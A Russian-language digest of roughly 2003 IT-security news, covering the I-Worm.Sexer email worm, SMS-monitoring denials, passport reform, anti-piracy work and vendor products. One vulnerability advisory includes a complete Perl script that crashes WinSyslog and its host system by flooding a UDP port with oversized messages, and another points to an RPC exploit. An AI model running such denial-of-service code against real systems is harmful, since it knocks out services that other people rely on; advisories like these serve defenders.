"Лаборатория Касперского", ведущий российский разработчик систем защиты от вирусов, хакерских атак и спама, предупреждает об обнаружении нового сетевого червя I-Worm.Sexer, агитирующего за одного из кандидатов на пост мэра г. Москвы. На данный момент служба технической поддержки компании уже получила несколько десятков сообщений о случаях заражения, вызванных этим червем.

"Sexer" принадлежит к разряду так называемых почтовых червей, которые распространяются в письмах электронной почты. Вредоносная программа доставляется на компьютеры-жертвы в сообщении с фальшивого адреса nicky@yahoo.com и имеет следующий формат:

Заголовок: посмотри, какая прелесть!))
Имя вложенного файла: SEX.EXE

Если пользователь имел неосторожность запустить вложенный файл, то червь показывает на экране текст, агитирующий за одного из кандидатов на пост мэра г. Москвы.

После этого "Sexer" копирует себя в корневой каталог диска C и регистрируется в ключе автозапуска системного реестра Windows. Червь также модифицирует фон рабочего стола и размещает на нем все ту же агитирующую заставку. Затем "Sexer" находит на зараженном компьютере адресную книгу (Windows Address Book) и, незаметно для пользователя, отправляет по всем обнаруженным там адресам свою копию.

"Трудно сказать, кто был инициатором создания червя и является ли этот случай классическим примером "черного пиара" или же образцом политической рекламы. Однако, не исключено, что в ходе проходящей предвыборной кампании пользователям придется столкнуться с похожими "политизированными" экземплярами вредоносных программ, - комментирует Денис Зенкин, руководитель информационной службы "Лаборатории Касперского", - В этой связи мы рекомендуем пользователям особенно внимательно относиться к электронным письмам, связанным с выборами. Ведь под маской "агитки" может скрываться вирус, и не исключено, что он окажется менее безопасным, чем "Sexer".

Процедуры защиты от данного сетевого червя уже добавлены в базу данных Антивируса Касперского®.
Более подробное описание I-Worm.Sexer доступно в Вирусной Энциклопедии Касперского по адресу: http://www.viruslist.com/viruslist.html?id=3023448

Вслед за операторами мобильной связи правоохранительные органы категорически опровергли саму возможность отслеживания SMS-сообщений.

"Отслеживание SMS-сообщений невозможно ни по правовым, ни по техническим, ни по экономическим аспектам", - заявил журналистам начальник первой оперативно-розыскной части криминальной милиции ГУВД столицы Дмитрий Чепчугов.

Напомним, что ранее "Столичная вечерняя газета" опубликовала материал, в котором сообщила, что российские службы будут контролировать тексты SMS, пересылающихся посредством мобильных телефонов. Специально для этого был якобы подготовлен список слов и выражений, использование которых в SMS вызывает подозрение. SMS со словами из "черного списка" не будут доходить до адресата, что должно помочь обеспечить безопасность в городе.

По данным издания, сообщения, которые содержат эти фрагменты, будут записываться в базу данных операторов сотовой связи, а потом передаваться работникам спецслужб.

Комментируя это сообщение, Н.Чепчугов отметил, что "на каждый контроль сообщения необходима судебная санкция, при этом обязательно в известность ставится оператор сотовой связи". Кроме того, он подчеркнул, что для эффективного отслеживания миллионов SMS-сообщений необходимо столько же приемников-перехватчиков.

"В-третьих, стоимость переработки такого объема информации составляет столько же, сколько переработка массивов Библиотеки имени Ленина, таких средств у нас нет", - заявил он.

Тем временем, отвечая на вопрос представителей прессы о снятии кодировки звонков в сотовых сетях, он напомнил, что такая мера принимается только в экстренных случаях. "Снятие кодировки не является ни для кого секретом, операторы сотовой связи ставятся заранее в известность, а на аппарате абонента в этом случае появляется спецсимвол", - добавил Н.Чепчугов.

Между тем, "Компьюлента" уже рассказывала о некоторых случаях контроля за службой коротких сообщений, лишний раз подтверждающих тот факт, что технически это вполне возможно. Самым наглядным примером является Китай, известный своей цифровой цензурой. В частности, во время эпидемии атипичной пневмонии китайские операторы сотовой связи передавали все сообщения, в которых упоминался SARS, спецслужбам. Тогда за рассылку SMS со слухами об атипичной пневмонии были задержаны не менее двенадцати человек. При этом необходимо подчеркнуть, что в КНР мобильной связью пользуются 250 млн. человек, а в России, по последним данным, - всего 30 млн. человек, то есть почти в восемь раз меньше.

"Лаборатория Касперского" обнаружила новый быстро распространяющийся интернет-червь.

Некоторые сведения о черве: распространяется через интернет в виде файла "sex.exe", прикрепленного к зараженным письмам. Написан на языке Delphi, имеет размер около 109К, упакован PKLite32 (размер распакованного файла - около 148К).

Зараженные письма содержат:

Адрес отправителя: nicky@yahoo
Заголовок: посмотри, какая прелесть!))
Имя вложения: sex.exe

Червь получает управление только если пользователь самостоятельно откроет вложенный файл.

В данный момент проводится детальный анализ червя, названного I-Worm.Sexer, подробная информация будет размещена в кратчайшие сроки.

Компания Verisign опубликовала результаты своего ежегодного исследования, посвященного безопасности в сети. Результаты оказались, мягко говоря, неутешительными.

В исследовании компании Verisign, озаглавленном "Данные о безопасности в интернете" отражены изменения, проиcшедшие во Всемирной сети за период с августа 2002 по август 2003 годов. Результаты, в частности, показали, что около 6,2 процента коммерческих транзакций являются попытками мошенничества, при этом примерно половина из них приходятся на США, а вторая половина - на весь остальной мир. Анализ источников атак показал высокую степень корреляции (47%) между источником мошеннических действий и атаками на системы безопасности. Это говорит о том, что хакеры, пытающиеся получить контроль над интернет-серверами - это те же люди, что и мошенники, подделывающие коммерческие транзакции.

Количество DNS-запросов за этот период увеличилось на 51,4%. количество DNS-запросов, связанных с электронными письмами, выросло за тот же период на 245 процентов. Это связано с увеличившимся количеством спама, использующего графические иллюстрации, а также с распространением почтовых вирусов, самостоятельно обращающихся к почтовым серверам.

Общее число инцидентов, связанных с безопасностью, увеличилось на 99% в расчете на один атакуемый компьютер. При этом вероятность того, что источник опасности расположен в США, составляет 81 процент. Мошенники предпочитают заниматься своим черным делом в других странах, пользуясь отсутствием соответствующих международных законов или низким уровнем государственного контроля.

Радует, что несмотря на растущее количество криминальных случаев, бизнес в интернете продолжает развиваться. Количество интернет-транзакций за прошедший год выросло на 17 процентов, а SSL (Secure Socket Layer) стал стандартом де-факто для передачи коммерческой информации. На использование SSL перешли свыше 400 тысяч сайтов, и их количество продолжает стремительно увеличиваться.

Паспортная реформа в России будет продолжаться. Как заявил сегодня глава МВД Борис Грызлов, министерство подготовило поправку в законодательство, согласно которой по желанию гражданина в его паспорт может быть внесена запись о его национальной принадлежности, а также проставлен ИНН. Придется вносить изменения и в "выездные" документы, что связано с решениями, принятыми на уровне стран ЕС и "большой восьмерки": усиление мер безопасности требует внесения в загранпаспорта биометрических показателей (отпечатков пальцев, снимка радужной оболочки глаза, температурной карты лица).

Что касается нынешнего этапа реформы - обмена советских паспортов на российские, - то, по словам министра, "нет сомнений, что этот процесс завершится до конца текущего года". Этот оптимистический прогноз Грызлов, правда, тут же сам поставил под сомнение, заявив, что обладателям "серпасто-молоткастых" удостоверений личности с 1 января "будет предложено срочно обменять паспорт и заплатить штраф" (значит, "отказники" или "волокитчики" все-таки предвидятся).

Совещание в МВД и выступление на нем "главного милиционера" лишний раз высветили темы, становящиеся особенно актуальными накануне выборов. Паспортная система страны последнее время подвергалась ожесточенной критике с самых разных позиций, и власть (во всяком случае, исполнительная) вела себя в этом отношении все более гибко. Мусульманские активистки добивались права фотографироваться "на паспорт" в платке-хиджабе - и Борис Грызлов им это право предоставил. Правозащитники хотели либерализации процесса получения этого самого паспорта для граждан бывшего СССР - и Владимир Путин инициировал соответствующие поправки в закон "О гражданстве". Теперь различные политические группировки (как в "национальных" регионах, так и на федеральном уровне одна небольшая, но, судя по рекламному бюджету, далеко не бедная политическая партия организовала соответствующий сбор подписей) добиваются восстановления пресловутой "пятой графы". И власть опять идет навстречу.

Еще совсем недавно милиция категорически возражала против паспортного фото в головном уборе, "затрудняющего идентификацию личности". Путин в прошлом году подписал "жесткий" закон "О гражданстве", тем самым фактически согласившись с мнением одного из депутатов, что "не следует превращать страну в пылесос, который втягивает преступников, негодяев, бомжей". Что касается "пятого пункта", то он считался чуть ли не расистским, позорным пережитком тоталитарного прошлого. И вот все чудесным образом переменилось. Правда, обязательную графу о национальности восстанавливать не решились, ориентируясь, вероятно, на мнение международного сообщества, но добровольно лишний раз погордиться своей народностью разрешили. Все, так сказать, для блага электората - даже либеральные поправки в закон "О гражданстве" (власть вспомнила, что миллионы россиян имеют родственников в ближнем зарубежье и переживают за их судьбу). Нет сомнений, что, если бы россияне меняли свои паспорта не так быстро, "отстающим" пошли бы навстречу и продлили срок обмена, лишь бы довольные россияне пришли на избирательные участки и проголосовали за кого надо.

Все же непопулярные новшества оставлены "на потом". В частности, все что касается загранпаспортов и "биометрических параметров" (в США эта тема стала обсуждаться сразу после 11 сентября 2001 г.). Ведь мало того, что их внесение наверняка удлинит процедуру получения документа и сделает ее более дорогой, наверняка найдутся правозащитные и религиозные возражения против таких новшеств. Понятное дело, указанное касается не только проблем, связанных с паспортами - национальными и заграничными. Исполнительная власть и "ее" фракции в законодательных органах готовы по крайней мере обсуждать любые либеральные инициативы. Включая альтернативную гражданскую службу по месту жительства или поправки в закон об ОСАГО.

С одной стороны, можно только выражать удовлетворение тем обстоятельством, что власть показывает свою зависимость от мнения народа, хотя бы на предвыборном этапе. Впрочем, так было всегда или почти всегда. Даже в брежневское время, когда выборы были вроде бы простой формальностью, даже намека на то, что избиратели дома (подъезда, квартиры) могут не придти к урнам для голосования, заставляли местные власти суетиться и заботиться о народных чаяниях (в более ранее время такие намеки скорее карались). В 1996 г. в канун президентских выборов бюджетникам, месяцами ожидавшим зарплату, вдруг начали ее выплачивать. Проблемы появлялись потом, и нынешние уступки также могут "аукнуться". К примеру, выяснится, что идентифицировать женщин-камикадзе по фото в платках все-таки трудно (если не дополнить фото "биометрическими" показателями во внутренних документах). А поправками в закон "О гражданстве" начали пользоваться отнюдь не те, для кого собственно эти поправки предназначались. И так далее. Придется опять что-то менять в тексте законов, а это будет уже гораздо сложнее. Хотя бесконечные новации и реформы кому-то во властных структурах, наверное, и нравятся.
 
4

Программа: WinSyslog version 4.21 SP1 Опасность: Средняя Наличие эксплоита: Да Описание: Уязвимость обнаружена в WinSyslog. Удаленный атакующий может заверсить работу приложения и системы. Удаленный атакующий может послать чрезмерно длинное сообщение к WinSyslog программе, чтобы завесить работу WinSyslog и операционной системы. Пример/Эксплоит: #!/usr/bin/perl #WinSyslog System Freeze Vulnerability use IO::Socket; $host = "192.168.1.44"; $port = "10514"; $data = "A"; $socket = IO::Socket::INET->new(Proto => "udp") or die "Socket error: $@\n"; $ipaddr = inet_aton($host) || $host; $portaddr = sockaddr_in($port, $ipaddr); for ($count = 0; $count < 1000; $count ++) { $buf = ""; $buf .= "A"x((600+$count)*4); print "Length: ", length($buf), "\n"; send($socket, $buf, 0, $portaddr); print "sent\n"; } print "Done\n"; URL производителя:http://WinSyslog.com Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время. Ограничьте доступ к программе только из доверенных IP адресов.

Системный интегратор компания “Оптима” завершила первый этап проекта по защите информации в Государственном таможенном комитете (ГТК) России.

“Оптима” создает в ГТК защищенную систему обмена информацией между подразделениями, включающую в себя “подсистему обеспечения безопасности информации ЕАИС (ОБИ ЕАИС)”, “Удостоверяющий центр ИОК”, ведомственную электронную почту, базу данных органов ГТК, систему контроля таможенных платежей и валютно-банковского контроля.

При создании компонентов подсистемы ОБИ специалисты “Оптимы” разработали программные образцы элементов системы криптографической защиты SQL-соединений, средств организации защищенного удаленного доступа к базам данных через Web-соединение, средств автоматизации криптографической защиты процессов файлового обмена в прикладных подсистемах ЕАИС ГТК, а также средств организации криптографической защиты подсистемы ведомственной электронной почты.

Удостоверяющий центр ИОК ГТК предназначен для организации защищенного электронного документооборота таможенных органов с применением электронной цифровой подписи, а также для криптографического обслуживания других подсистем ЕАИС.

После ввода в эксплуатацию удостоверяющий центр заработает в единой автоматизированной информационной системе ГТК России.

По договору между ГТК и “Оптимой” в 2003—2005 гг. планируется развитие установленных систем.

Программа: Microsoft Windows 2000 Опасность: Средняя Наличие эксплоита: Да Описание: Уязвимость состояния операции обнаружена в некоторых версиях Microsoft Windows. Злонамеренный пользователь может вызвать отказ в обслуживании. Уязвимость состояния операции обнаружена при обработке входящих RPC запросов. Удаленный пользователь может послать несколько специально обработанных RPC запросов, чтобы заставить 2 потока обработать один и тотже RPC запрос. В результате удаленный атакубщий модет аварийно завершить работу RPC службы и перезагрузить операционную систему. Эксплуатация уязвимости для выполнения произвольного кода по словам X-Force затруднительна. Однако, как стало известно SecurityLab, существует рабочий эксплоит, который с вероятностью 5-10% компрометирует уязвимую систему. Пример/Эксплоит: http://www.securitylab.ru/40757.html URL производителя:http://www.microsoft.com/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. Отключите DCOM. Фильтруйте уязвимые порты.

Microsoft RPC Race Condition Denial of Service

Интернет-ассоциация Украины (ИнАУ) обратилась в Организацию по безопасности и сотрудничеству в Европе (ОБСЕ) с жалобой на украинские власти, которые пытаются, по ее мнению, установить мониторинг за украинским сегментом Всемирной сети, нарушив, таким образом, право человека на тайну переписки.

Как передает агентство "Интерфакс-Украина", на проходящем в Варшаве совещании Организации ИнАУ сообщила о существовании на Украине обязательных требований к обслуживающим госорганы интернет-операторам, в частности, предусматривающих установку мониторингового оборудования.

Дело в том, что приказом Госкомсвязи Украины №122 от 17 июня 2002 года установлен порядок составления перечня предприятий, предоставляющих услуги доступа в интернет органам исполнительной власти, другим государственным органам, предприятиям, учреждениям, организациям, которые получают, обрабатывают, распространяют и сохраняют информацию, являющуюся объектом государственной собственности. А тем временем, в этом списке числятся два украинских провайдера, что и послужило поводом для подозрений.

Как указывает в своем докладе ИнАУ, "незаконный мониторинг приводит к тому, что Служба безопасности Украины получает полный неконтролируемый доступ к информационным потокам Интернет, включая конфиденциальную информацию и личную переписку. Интернет Ассоциация Украины считает недопустимым такое нарушение деклараций о правах личности".

Как ранее сообщало агентство, приказом Госкомсвязи 122 установлен порядок составления перечня предприятий, предоставляющих услуги по доступу к интернет органам исполнительной власти, другим государственным органам, предприятиям, учреждениям, организациям, которые получают, обрабатывают, распространяют и сохраняют информацию, являющуюся объектом государственной собственности. В настоящее время, в соответствии с данными, опубликованными на официальном сайте Госкомитета связи и информатизации, в перечне числятся два провайдера.

15 сентября состоялось очередное собрание членов Некоммерческого партнерства поставщиков программных продуктов (НП ППП), на котором его руководители -- президент Борис Нуралиев (фирма "1С") и исполнительный директор Дмитрий Соколов -- отчитались о проделанной работе и обсудили с участниками мероприятия планы на будущее.

Хотя такие встречи проходят каждые полгода, именно сентябрьские традиционно носят формат "годового отчета" (о прошлогоднем см. PC Week/ RE, N 38/2003, с. 39).

Созданное в конце 2000-го НП ППП является одним из старейших альянсов отечественных разработчиков ПО, в его состав входит почти 150 компаний из 50 регионов страны.

В качестве цели в уставе партнерства определено "объединение усилий по созданию в России цивилизованного софтверного рынка", но за этими словами скрывается более прозаическая задача -- борьба с пиратством.

На прошлогоднем собрании НП ППП высказывались идеи о расширении круга софтверной проблематики, которая могла бы быть в поле зрения этой организации: подготовка ИТ-специалистов, снятие неоправданных таможенных барьеров и пр.

Однако сейчас стало ясно, что для партнерства вполне достаточно и борьбы с пиратством, тем более что именно она является проблемой номер один в софтверной индустрии.

Сравнение прошлогоднего и нынешнего собраний НП ППП позволяет проанализировать динамику развития ситуации в сфере программного пиратства и сделать следующие выводы.

Год назад почти половина времени на заседании была отведена сетованиям по поводу непонимания проблемы и невнимания к ней со стороны чиновников из самых разных структур.

Сейчас разговоров об этом было не так много. Конечно, сложности во взаимоотношениях с представителями государства остаются, но, во-первых, есть заметный прогресс в этом диалоге, а во-вторых, представители ИТ-бизнеса осознали, что для изменения позиции чиновников нужны не столько обращения к высшим руководителям государства, сколько постоянная и кропотливая работа на нижнем уровне.

Примером этого может быть почти двухлетняя борьба в Государственной Думе по поводу принятия поправки в "нужной" формулировке к статье 146 УК относительно определения "существенный ущерб".

Сейчас можно констатировать, что юридические методы борьбы с пиратами в различных регионах страны вышли на уровень обычной судебной практики.

Этому во многом способствовала активная деятельность являющегося подразделением партнерства Юридического агентства "Защита поставщиков программных продуктов" (ЮА ЗППП), которое за последние полгода провело более 100 исследований и экспертиз по уголовным делам, связанным с нарушениями авторских прав: только по Москве возбуждено более 30 уголовных дел.

Однако самое главное, что к задачам преследования пиратов подключились региональные ИТ-компании и местные органы милиции. Этому во многом способствует выпуск НП ППП при участии ряда управлений МВД регулярно обновляемого пособия "Компьютерное пиратство: методы и средства борьбы".

За минувший год были созданы прецеденты судебного наказания пользователей нелицензионных продуктов.

Очень любопытный факт: уже есть случаи, когда к борьбе с пиратами подключаются "профессионалы" -- компании или частные лица, которые работают на коммерческой основе, представляя в суде интересы истца и рассчитывая на существенную долю от взысканных по суду денег.

Правда, на сегодня финансовые меры по отношению в пиратам чаще всего оборачиваются против самого потерпевшего. Дело в том, что сразу после вынесения судебного решения о взыскании штрафа в пользу правообладателя последний автоматически должен заплатить 25-процентный налог с этой суммы.

А вот получить с пирата сами деньги удается далеко не всегда. Именно поэтому одной из задач НП ППП является изменение практики взимания налогов в таких случаях -- только после реальной выплаты штрафов.

На собрании активно обсуждались предложения со стороны государственных органов по введению обязательного лицензирования деятельности по производству экземпляров программ для ЭВМ и обязательной их маркировке.

Позиция членов НП ППП в этом вопросе оказалась довольно единодушной -- подобные методы принесут рынку больше вреда, чем пользы: законопослушные компании будут нести дополнительные затраты, а пираты легко такие барьеры обойдут.

С обеспокоенностью участники встречи отметили "перегибы на местах" в связи с вводимыми ограничениями на продажу объектов интеллектуальной собственности в розничной торговле.

В целом, по мнению членов НП ППП, несмотря на достигнутые успехи в борьбе с пиратами, ущерб, наносимый нарушителями авторских прав на ПО, остается примерно на прежнем уровне.

В частности, силовые методы воздействия заставили продавцов нелегального софта прибегнуть к более конспиративным методам работы, но объем таких поставок снизился не очень значительно.

Очевидно, что для расширения антипиратского фронта должны быть задействованы не только юридические, но и просветительские методы.

На собрании было решено больше внимания обратить на вопросы популяризации легальной продукции, в частности разработать набор агитационных материалов (плакаты, брошюры, стикеры, комиксы и т. п.) как для распространения через членов НП ППП, так и для оформления непосредственно торговых мест, в том числе с использованием товарного знака партнерства.

За последний год число членов НП ППП выросло более чем на 50%, однако зарубежные софтверные компании не спешат подключиться к борьбе с пиратством -- из них в альянс входит только Microsoft.

Эта ситуация очень четко показывает, что нарушение авторских прав наносит ущерб в первую очередь именно российским разработчикам ПО. Более того, подрывая бизнес и конкурентоспособность отечественных компаний, пираты фактически работают в пользу западных поставщиков программных продуктов.

Здесь нужно отметить, что, к сожалению, до сих пор в поле зрения НП ППП не входит один очень актуальный вопрос: оценка объема российского софтверного рынка и ущерба, наносимого ему пиратами.

Без таких данных очень сложно, с одной стороны, объяснить обществу важность проблемы, а с другой -- отслеживать эффективность принятия тех или иных мер.

О необходимости выработки методик, позволяющих оценить состояние российской индустрии ПО, говорилось на прошлогоднем собрании, но никаких реальных шагов в этом направлении не было сделано.

Год назад НП ППП стало одним из первых коллективных членов АПКИТ -- главной ИТ-ассоциации страны. Выступивший на собрании исполнительный директор АПКИТ Николай Комлев сообщил, что сотрудничество с НП ППП активно развивается в рамках профильных комитетов.

Особенно полезна такая кооперация при решении законодательных вопросов и при взаимодействии с государственными структурами.

Испанская компания Panda Software представила новые продукты, нацеленные на обеспечение информационной безопасности индивидуальных пользователей и компаний.

Предназначенный для домашних пользователей Titanium Antivirus 2004 (рекомендованная цена обычных версий — 39,95 евро, а специальных студенческих и DVD-версий — 19,95 евро) в отличие от своего предшественника, просто Titanium Antivirus’а, защищает не только от вирусов, но и от телефонных дозвонщиков, хакерских взломов и других напастей.

Квалифицированным домашним пользователям, профессионалам и малым предприятиям Panda Software адресует принципиально новый пакет Platinum Internet Security (рекомендованная цена обычных версий — 79,95 евро, а специальных студенческих и DVD-версий — 34,95 евро), включающий совокупность технологий для борьбы с Интернет-угрозами.

В частности, данный продукт содержит средства спам-блокирования и модуль для искоренения программ-шпионов, установленных на ПК без ведома пользователя.

Для компаний небольшого и среднего масштаба испанская фирма разработала пакет BusinesSecure — решение для защиты автоматизированных рабочих мест (АРМ) и файловых служб от вирусов, троянов и червей. BusinesSecure может быть укомплектован опцией ExchangeSecure для защиты Microsoft Exchange Server.

Еще одна новинка — EnterpriSecure Antivirus — обеспечивает полную и автоматическую защиту как корпоративной сети в целом, так и всех ее компонентов, включая АРМ, электронную почту, Интернет-шлюзы и др., от вредоносных кодов.

Разработчки утверждают, что эти антивирусные программы легко устанавливаются и к тому же не требуют постоянного наблюдения со стороны администраторов и выполнения прочих рутинных операций по обслуживанию.

Новые корпоративные продукты Panda Software будут продаваться в виде лицензий. Стоимостью одной лицензии для BusinesSecure (приобретать можно от 5 до 25 лицензий с годовым сроком обслуживания) — от 57,36 евро, а для EnterpriSecure Antivirus (от 10 до 25 лицензий с годовым сроком обслуживания) — от 87,95 евро.

С ноября эти продукты можно будет купить, зайдя на сайт Panda Software Russia.

В середине сентября в Москве прошел IX Форум разработчиков интегрированных банковских систем, собравший более 40 компаний и около 900 специалистов.

И хотя этот сегмент рынка еще не приблизился к показателям рекордного преддефолтного года, все свидетельствует о том, что закрепившимся на нем компаниям будет чем заняться в ближайшие годы. Годовой суммарный оборот отрасли на протяжении нескольких лет растет с темпом 25% и достиг в прошлом году 58 млн. долл.

Цифра эта, являющаяся результатом оценки аналитиков изданий "Коммерсант" и iOne, приведена в весьма любопытном исследовании, результаты которого были розданы участникам конференции.

Поскольку многие из них в своих выступлениях охотно ссылались на него, можно считать, что существенных возражений это исследование не вызвало, а потому и мы в своем отчете будем ссылаться на его результаты. Согласно его данным, в частности, в явные лидеры рынка по числу внедрений вышли две компании -- R-Style Softlab (23%) и "Диасофт" (21%).

Третьим "призером" в этой гонке стала весьма разношерстная команда, представляющая собственные разработки банков (16%).

Как отметил председатель совета директоров "Диасофта" Александр Глазков, если раньше активность рынка АБС стимулировалась в основном постановлениями Центробанка, вынуждавшего разработчиков учитывать изменения нормативной базы, а банки -- приобретать новые версии или даже переходить на другие продукты, то в последние годы таким стимулом было развитие самого бизнеса кредитных учреждений.

Разумеется, нормотворческий фактор не исчез совсем: в 2004 г. предстоит переход на международную систему финансовой отчетности (МСФО).

Но основными движущими силами, по мнению большинства выступавших, стали рост объемов розничных услуг, расширение числа пользователей пластиковых карт и высокий спрос на средства автоматизации операций с ценными бумагами.

Впрочем, по результатам опроса, проведенного среди 978 российских кредитных учреждений, выяснилось, что несомненным лидером в области автоматизации вышеупомянутых функций является виртуальная команда разработчиков ИТ-департаментов самих банков, а не поставщики АБС.

Судя по представленным на форуме докладам, последние собираются ликвидировать дефицит столь популярных функций в самые сжатые сроки. Наряду с функциональностью к числу основных приоритетов все чаще относят такие характеристики технологических платформ, как производительность и масштабируемость.

Не случайно один из двух круглых столов форума был посвящен ИТ-стратегии банка и вопросам выбора, внедрения и сопровождения АБС (на втором обсуждался переход на МСФО).

По словам г-на Глазкова, в среднем каждый банк раз в пять лет либо меняет АБС (таких примерно треть), либо переходит на новую версию. Наряду с объективными причинами (появление новых технологий или видов бизнеса) подобные шаги бывают вызваны просчетами разработчиков в выборе стратегии.

Сегодня, например, многие вендоры заговорили о необходимости перехода на промышленные СУБД. Причина очевидна: растут масштабы банков, бурно развиваются розничные услуги.

Объем обрабатываемых данных и поток транзакций многократно увеличиваются, а время отклика приложения при этом не должно выходить за разумные границы.

О сроках консервации принятых некогда стратегических решений говорит тот факт, что сегодня 44% АБС построено на платформе СУБД Btrieve и лишь в 17% используется Microsoft SQL Server и в 13% -- Oracle.

Ничем, кроме популярности в свое время в нашей стране ОС NetWare, которую компания Novell поставляла в комплекте с СУБД Btrieve, объяснить этот феномен невозможно.

Один из лидеров отрасли -- компания R-Style -- наряду со старой версией (сейчас она называется RS-Bank/ Pervasive и ориентирована на небольшие и средние банки) предлагает теперь и продукт RS-Bank V.6 для крупных кредитных организаций на платформе Oracle9i.

Переход на промышленные СУБД стимулируется также ростом интереса к системам поддержки принятия решений, базирующихся на технологиях хранилищ данных. Последние, как оказалось, необходимы и для выпуска отчетности по стандартам МСФО, поскольку при этом требуется консолидация информации из разнородных источников.

Свои решения в данной области представили компании "ПрограмБанк", R-Style, "Диасофт", CSBI, ЦФТ и "Заказные ИнформСистемы".

Заметная активность наблюдается в организации дистанционного обслуживания клиентов по каналам сотовой связи и через Интернет. Есть решения, в которых оба этих канала комбинируются, что, по мнению их разработчиков, существенно снижает риски хищения средств клиентов (к примеру, услуга заказывается на Web-сайте с подтверждением по мобильному телефону).

Традиционные разговоры об отставании российских разработчиков от их западных коллег далеко не всегда соответствуют истине. Об этом говорил в своем выступлении заместитель генерального директора компании ФОРС Геннадий Заманский, обсуждая последствия возможного прихода в Россию крупных зарубежных банков.

Отечественные разработки, полагает он, вышли сегодня на весьма высокий уровень, и основная опасность исходит не от их конкурентов, а от больших и "дешевых" денег, с которыми западные киты придут на наш рынок.

С учетом этого российским кредитным учреждениям для успешной конкуренции с "пришельцами" придется обратить самое пристальное внимание на снижение издержек.

Местные разработчики могут оказать им в этом деле существенную помощь, создавая системы, совмещающие достоинства коробочных и заказных решений.

Все идет к тому, что банки будут сливаться и укрупняться и масштабы их бизнеса, включая и розничную сеть, будут расти. Кроме того, продолжится увеличение количества и качества банковских продуктов.

Отметив эти тенденции, г-н Глазков сообщил, что "Диасофт" намерен сконцентрировать свои усилия на решениях для крупных банков. Уже сегодня у некоторых клиентов этой фирмы установлено 300--400 рабочих мест, а в недалеком будущем их число может перевалить за тысячу.

По сути, это означает, что, выпуская продукты для сегодняшних крупных учреждений, "Диасофт" со временем намерен закрыть с их помощью потребности и средних банков.

Выступая на открытии форума, глава Ассоциации российских банков Гарегин Тосунян призвал к созданию единого реестра программно-аппаратных средств, рекомендуемых к применению в банковском секторе. По его мнению, реестр должен быть сформирован самим банковским сообществом.

Вероятно, многие заказчики действительно нуждаются в независимой экспертизе предлагаемых им решений.

Думается, однако, что основной акцент должен делаться не на самом реестре, а на выработке банковским сообществом рамочных стандартов, обуславливающих включение либо невключение того или иного продукта в заветный реестр. Такой подход, кстати, будет вполне в духе недавно принятого закона о техническом регулировании.

Министр информации Кореи объявил о начале большой охоты на средние и крупные компании, пользующиеся пиратскими программами. В выходные дни полиция начнет проверки. Пользователи, установившие нелицензионные программы у себя дома, не пострадают, пообещал министр.

Корейское правительство уже несколько лет ведет беспощадную борьбу с пиратством, но воровство интеллектуальной собственности по-прежнему процветает. По данным на конец июля, число устанавливаемых пиратских программ выросло на 88% по сравнению с первыми 7 месяцами прошлого года. Было выявлено более 12 тысяч случаев нелегального использования ПО. По подсчетам правоохранительных органов Кореи, в этом году индустрия программного обеспечения потеряла более $3 млн.

Порой, все свое свободное время, пользователи проводят за сетевыми играми EverQuest, Ultima Online, Star Wars, пытаясь повысить "класс" своего персонажа, добыть немного магии и заработать денег.

Такая картина, при росте широкополосного доступа в интернет, способствует росту и количеству любителей легкой наживы, готовых отобрать у честного сетянина все его виртуальное богатство. Как бороться с таким виртуальным преступлением и нужно ли?

Ведь фанатичный геймер, чтобы одержать победу над другими игроками, когда его "упакованный" до предела игровой герой обладает высшем уровнем колдовства или силы, будет согласен на любые предложения. Такой герой может стоить до нескольких сотен долларов, что по американским меркам не такие большие деньги. Именно на таких на "болезненных" увлечениях пользователей и спекулируют предприимчивые дельцы.

Для этого на аукционах выставляются отобранные у других "сетян" предметы. Вот тут и возникает ранее уже затронутый вопрос - имеет ли воровство в виртуальности связь с кражей обычной интеллектуальной собственности и нужно ли вообще заниматься данным вопросом?

Тема Интернет-преступлений и борьбы с ними – одна из любимых для обсуждения среди западных правоохранительных структур. Недавно Лен Хиндс, глава британского Национального управления по преступлениям в сфере высоких технологий (NHTCU), заявил в интервью агентству Reuters, что на смену разрозненному мошенничеству и взломам приходит настоящая организованная киберпреступность. В своей речи он также отметил, что в последнее время британским следователям все чаще встречаются случаи преступлений, корни которых уходят в страны Восточной Европы и бывшего Советского Союза. Иными словами, Запад ждет новой волны активности русской мафии, только уже на киберуровне.

Самые известные преступники-хакеры происходят из западных стран: Дэвид Смит (автор вирусов “I love you” и “Melissa”) – американец, Ян де Вит (“Anna Kurnikova”) – голландец, а Саймон Вэллор (“Gokar”) родом из Великобритании. Причем же здесь русские? Да, словосочетание “Russian mafia” давно стало нарицательным, и его, как огня, боятся американские и не только бизнесмены. Но ни Алимжан Тахтахунов (Тайванчик), ни какой-либо другой авторитет до настоящего времени в международной киберпреступности замечен не был. Во всяком случае, если говорить об организованной преступности.

Более того, нашумевшие преступления, связанные с распространением детской порнографии, взломами банков или хакерскими атаками, характеризуют скорее Германию, Великобританию, Францию, США, но не Россию.

Однако эти два магических слова (Russian mafia), видимо, настолько засели в голову жителям западных стран, что они предпочитают не отделять обычную жизнь от виртуальной. Потому с подачи Лена Хиндса (хотя он, конечно, не первый) Россия в глазах Запада постепенно превращается в страну, представляющую угрозу национальной безопасности для большинства государств развитого мира.
14

На заседании Комитета по безопасности Государственной Думы среди прочих был рассмотрен вопрос "О проведении III-й Всероссийской Конференции "Индустрия безопасности России в 2004 году. Перспективы, тенденции, проблемы".

Ее проведение запланировано на 4 февраля в рамках IX Международного Форума "Технологии безопасности – 2004".

В редакции www.OXPAHA.ru имеется копия решения Комитета по безопасности №112-9/2 от 9 октября т.г., в котором, в частности, говорится: Обсудив ход подготовки III-й Всероссийской Конференции "Индустрия безопасности России в 2004 году. Перспективы, тенденции, проблемы" … Комитет по безопасности решил – Поддержать проведение указанной конференции. Председатель комитета – А.И.Гуров.

Редакция намерена своевременно информировать читателей о ходе подготовки и проведении конференции, имеющей важное значение для субъектов рынка безопасности.

Интернет-ассоциация Украины (ИнАУ) пожаловалась ОБСЕ на то, что официальные власти пытаются установить контроль Службы безопасности Украины (СБУ) за всей информацией, которая будет проходить по каналам провайдеров, работающих с госорганами, передает "Интерфакс". Как сообщается в пресс-релизе ИнАУ, 17 июня 2002 года Государственным комитетом связи и информатизации Украины был издан приказ номер 122 "Об утверждении Порядка составления и ведения перечня предприятий (операторов), которые предоставляют услуги по доступу к глобальным сетям передачи данных органам исполнительной власти, другим государственным органам, предприятиям, учреждениям и организациям, которые получают, обрабатывают, распространяют и сохраняют информацию, которая является объектом государственной собственности и охраняется согласно законодательству".

